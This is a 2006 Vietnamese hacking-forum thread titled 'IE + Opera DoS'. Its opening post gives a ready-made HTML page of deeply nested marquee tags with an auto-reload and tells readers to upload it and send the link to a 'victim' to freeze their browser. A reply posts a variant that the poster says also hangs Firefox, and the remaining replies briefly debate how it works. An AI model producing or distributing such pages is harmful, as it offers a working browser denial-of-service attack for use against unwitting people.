banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits IE + Opera DoS  XML
  [Question]   IE + Opera DoS 26/06/2006 10:56:47 (+0700) | #1 | 940
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]
Chỉ cần tạo 1 tập tin *.html rồi up lên mạng => đưa link cho victim là ok

Code:
<html>

<head>

<style>

</style>

<title>You will die</title></head>

<body onload="javascript:window.location.reload(false)">

<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>

<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>

<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>

<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>

<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>

<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>

<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>

<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>

<marquee><marquee><marquee><marquee></marquee></marquee></marquee></marq

uee></marquee></marquee></marquee></marquee></marquee></marquee></marque

e></marquee></marquee></marquee></marquee></marquee></marquee></marquee>

</marquee></marquee></marquee></marquee></marquee></marquee></marquee></

marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma

rquee></marquee></marquee></marquee></marquee></marquee></marquee></marq

uee></marquee></marquee></marquee></marquee></marquee></marquee></marque

e></marquee></marquee></marquee></marquee></marquee></marquee></marquee>

</marquee></marquee></marquee></marquee></marquee></marquee></marquee></

marquee></marquee></marquee></marquee></marquee></marquee></marquee>

</body>

</html>
[Up] [Print Copy]
  [Question]   IE + Opera DoS 26/06/2006 13:53:14 (+0700) | #2 | 979
hide_hack
Member

[Minus]    0    [Plus]
Joined: 27/10/2004 23:37:02
Messages: 12
Offline
[Profile] [PM]
cai gi the nay ???? chang qua cho doan JV chay thoi ma?
[Up] [Print Copy]
  [Question]   IE + Opera DoS 27/06/2006 00:00:50 (+0700) | #3 | 997
[Avatar]
DaoDuyHieu
HVA Friend

Joined: 14/04/2004 00:32:37
Messages: 200
Location: MICROSOFT
Offline
[Profile] [PM] [Email] [Yahoo!] [MSN]
FireFox cũng bị dính chấu em này nữa smilie
Code:
<html>
<head>
<title>Credit's go to n00b</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</body>
</html>


@hide_hack : khi bồ dùng trình duyệt mà gặp đoạn code đó thì trình duyệt của bồ sẽ bị treo smilie bồ thử save nó thành file .html rồi chạy thử đi smilie
Great hopes make great men smilie
[Up] [Print Copy]
  [Question]   Re: IE + Opera DoS 27/06/2006 08:58:10 (+0700) | #4 | 1257
jackly
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 20:17:52
Messages: 11
Location: CHV
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
cái này cũng giống cái code popup thôi mà ! nguyên lí tương tự
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|